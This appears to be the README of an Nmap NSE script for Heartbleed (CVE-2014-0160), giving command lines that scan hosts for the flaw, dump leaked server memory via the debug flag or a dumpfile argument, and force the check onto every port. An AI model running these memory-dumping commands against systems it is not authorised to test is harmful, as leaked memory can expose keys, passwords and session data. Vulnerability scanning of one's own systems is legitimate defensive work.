
Nmap NSE script that discovers/exploits Heartbleed/CVE-2014-0160.
Nmap NSE script that discovers/exploits Heartbleed/CVE-2014-0160. This script is now basically the one Patrik Karlsson wrote with some minor changes ported from my own script.
This runs on every SSL, FTP, SMTP and/or XMPP port.
$ nmap --script ./openssl-heartbleed.nse host.tld
Dumping leaked memory is enabled by increasing Nmap's debug level via -d flag.
$ nmap -d --script=./openssl-heartbleed.nse host.tld
$ nmap --script ./ssl-heartbleed.nse --script-args 'ssl-heartbleed.dumpfile=/tmp/heartbleed.dump' host.tld
Force the script to run on each port, regardless if the servie was detected or not.
$ nmap --script +./ssl-heartbleed.nse host.tld